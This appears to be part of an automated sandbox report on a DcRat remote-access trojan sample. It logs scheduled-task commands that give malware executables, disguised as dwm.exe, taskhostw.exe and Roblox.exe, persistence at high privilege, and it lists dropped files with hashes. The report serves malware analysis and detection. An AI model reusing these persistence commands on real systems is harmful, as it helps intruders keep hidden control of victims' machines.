                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:3500
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\winNet\msiexec.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4120
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4920
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:4992
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\DriversavessessionDlldhcp\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:1188
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:3712
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "sddsfsdf" /sc ONLOGON /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:2884
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "sddsfsdfs" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\sddsfsdf.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:1972
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\AppData\Local\taskhostw.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:5808
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:4336
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\AppData\Local\taskhostw.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:2008
                                                                                                                                                                                • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                  C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:5684
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 10 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                  PID:408
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • DcRat
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:5816
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 10 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:3536
                                                                                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:6928

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\Config.Msi\e57b24b.rbs

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.0MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  8535bc10d2d2a6b90ada0b08940cc6b5

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  fa08bf6da83df22ff0996d4b607d5b5f37af6071

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5c4b2c5bb6dc69df6f63be94abde71ca416aeea8ad4b97c1cdc1e2edf164b4f3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e00310949bd43a831f5491624ac51fc6cab363ce4d003b98d5cde68334f1888b5b1d423068a2f8e940f16709455dbe802cc30dbead0e96b27c92690d3145bbf7

                                                                                                                                                                                • C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  239B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  3492e48fb2e9fb2bfc18658e3d8f88bd

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  34cec8222aedc8baf774aa863a041a23971c7631

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

                                                                                                                                                                                • C:\Program Files\nodejs\node_etw_provider.man

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d3bc164e23e694c644e0b1ce3e3f9910

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1849f8b1326111b5d4d93febc2bafb3856e601bb

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  818B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  2916d8b51a5cc0a350d64389bc07aef6

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c9d5ac416c1dd7945651bee712dbed4d158d09e1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  5ad87d95c13094fa67f25442ff521efd

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  01f1438a98e1b796e05a74131e6bb9d66c9e8542

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  754B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d2cf52aa43e18fdc87562d4c1303f46a

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  58fb4a65fffb438630351e7cafd322579817e5e1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  771B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e9dc66f98e5f7ff720bf603fff36ebc5

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  730B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  072ac9ab0c4667f8f876becedfe10ee0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0227492dcdc7fb8de1d14f9d3421c333230cf8fe

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d116a360376e31950428ed26eae9ffd4

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  802B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d7c8fab641cd22d2cd30d2999cc77040

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d293601583b1454ad5415260e4378217d569538e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  bc0c0eeede037aa152345ab1f9774e92

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  56e0f71900f0ef8294e46757ec14c0c11ed31d4e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  780B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b020de8f88eacc104c21d6e6cacc636d

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  20b35e641e3a5ea25f012e13d69fab37e3d68d6b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  763B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7428aa9f83c500c4a434f8848ee23851

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  166b3e1c1b7d7cb7b070108876492529f546219f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  f0bd53316e08991d94586331f9c11d97

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f5a7a6dc0da46c3e077764cfb3e928c4a75d383e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

                                                                                                                                                                                • C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  771B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1d7c74bcd1904d125f6aff37749dc069

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  168B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  db7dbbc86e432573e54dedbcc02cb4a1

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  cff9cfb98cff2d86b35dc680b405e8036bbbda47

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7cf8a9c96f9016132be81fd89f9573566b7dc70244a28eb59d573c2fdba1def9

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8f35f2e7dac250c66b209acecab836d3ecf244857b81bacebc214f0956ec108585990f23ff3f741678e371b0bee78dd50029d0af257a3bb6ab3b43df1e39f2ec

                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  133B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  35b86e177ab52108bd9fed7425a9e34a

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  76a1f47a10e3ab829f676838147875d75022c70c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  3a6bad9528f8e23fb5c77fbd81fa28e8

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f127317c3bc6407f536c0f0600dcbcf1aabfba36

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  bd5940f08d0be56e65e5f2aaf47c538e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d7e31b87866e5e383ab5499da64aba50f03e8443

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  aaaac7c68d2b7997ed502c26fd9f65c2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  7c5a3731300d672bf53c43e2f9e951c745f7fbdf

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8724dc2c3c8e8f17aeefae44a23741b1ea3b43c490fbc52fd61575ffe1cd82bb

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c526febd9430413b48bed976edd9a795793ad1f06c8ff4f6b768b4ad63f4d2f06b9da72d4fcfa7cb9530a64e2dc3554f5ad97fd0ab60129701d175f2724ef1ac

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  944B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  ef647504cf229a16d02de14a16241b90

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  81480caca469857eb93c75d494828b81e124fda0

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6PuPX375Ni

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  114KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  a2bc4eb3c67f34d75effa9bde49c2ffb

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f38bf9e1468d1dd11a5d197c8befcbf9302e4e57

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a2afda6ed0239af2873e61cffb2817572f9f5ce278b509d6c9c9e5f368a178e5

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  30fd383d5b385ffb7f6551ea64636189bfa090a9097e8373574c6dcf3c9e7bbc8c08035057a5565fd139dc505e1ca40cd83df477c2ee67a605d0a2cf8481dffe

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9jRlZ35qEh

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  a182561a527f929489bf4b8f74f65cd7

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.2MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7529e4004c0fe742df146464e6aeadb0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ae7341ee066b31de5a1a1a25851b70ced41de13f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.9MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7d4b84a8c3d14cb3d1bb864719463404

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  544cf51aec717c63552f0fdf97d364b1b62a7a0c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  3aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Frage build.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.1MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  11fdce42422f8ed518fedf290f5bfc3c

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f18a4ad694af5ba50a7697b4cb66308454c555d9

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\PUGHhhRKsh

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  20KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  a603e09d617fea7517059b4924b1df93

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  31d66e1496e0229c6a312f8be05da3f813b3fa9e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Result.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.6MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  170b43350048ed4b6fca0e50a0178621

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  db863b7b04a7c58baa9120e2f184517ed27a7252

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  797KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  36b62ba7d1b5e149a2c297f11e0417ee

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ce1b828476274375e632542c4842a6b002955603

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Youtube.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8.7MB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d25ebdfc04bdadea74017fa72f90781f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f7278c4d04fc4db888368e0245d7607d8bcbb557

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g5q30gmh.hno.ps1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  60B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                  SHA1

